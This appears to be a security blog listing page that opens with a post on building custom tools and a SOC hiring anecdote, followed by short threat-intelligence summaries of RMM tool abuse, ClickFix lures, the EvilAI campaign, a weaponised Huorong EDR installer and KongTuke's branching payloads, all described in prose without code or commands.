Building Custom Tools for Shits and Giggles And Why Reinventing the Wheel is A Good Thing
Recently, I was on the hiring panel for a SOC analyst position. We received hundreds of applications, with about 10-15 ending in interviews. For the interviews, I read through each resume, and looked at all the linked GitHubs, blogs, and other sites. Something that stuck with me was how every single resume was exactly the same. They all had the same certs, they all had similar degrees, and most of them had nothing interesting in their GitHubs or personal sites. A lot of boilerplate projects that were copied from some other source.
Remote Monitoring and Management (RMM) tool abuse has become increasingly prevalent as threat actors continue to swap out traditional payloads for legitimate RMM tools. This is done for several reasons:
RMM tools are often deployed and utilized within an environment.
These are legitimate tools. They are signed by real companies and tend not to trigger alerts upon execution.
Many RMM tools come with silent or unattended installers.
Most RMM tools allow for full device control or remote command execution.
Because of this, the use of RMM tools in compromises rose 277% year-over-year in 2025 (Huntress).
Shout out to RedTeamRonin from DC612 for sending me this sample!
Incident Overview
Rock Fest is the largest rock and camping event in the United States. They use a WordPress domain that contains several potentially vulnerable plugins, including plugins vulnerable to multiple types of cross-site scripting attacks. It is likely that the domain was compromised through a vulnerable plugin or exposed admin credentials.
The ClickFix page utilizes the Windows Terminal variant lure. Instead of asking users to use the Windows Run menu (Win+R), this lure variant asks users to open PowerShell or the Terminal with Win+X, select an Admin shell, and paste & submit the copied command.
EvilAI is back at it again! Nothing significant has changed with the payload or the Node abuse, but the campaign has developed a new Advanced Installer MSI lure that unpacks and executes a WebView2 .NET application loader. This loader creates a temporary directory and downloads the Inno installer that contains the Node payload and configuration files. Like previous campaigns, the Node payload is executed via a Scheduled Task.
Huorong Security Management Weaponized in ClickFix Attacks
Huorong is a Beijing-based security company that offers an Endpoint Security Management Systems suite for enterprise and government customers. In newly observed ClickFix attacks, the Huorong EDR product is abused as an entry point into compromised systems. The Huorong Configuration Manager is bundled into an Advanced Installer MSI and installed on victim devices, giving malicious actors complete control over the device. The installer is deployed through compromised domains serving ClickFix (FakeCAPTCHA) lures.
KongTuke is a threat actor that has recently increased their usage of ClickFix and ClickFix-styled attacks. They've begun to utilize a branching infection path based on the domain status of an infected device: if the device is domain-joined, it receives a different payload than non-domain-joined devices. As Huntress notes, this is likely done to identify and target Active Directory environments (also go read that write-up, it's way better than this!).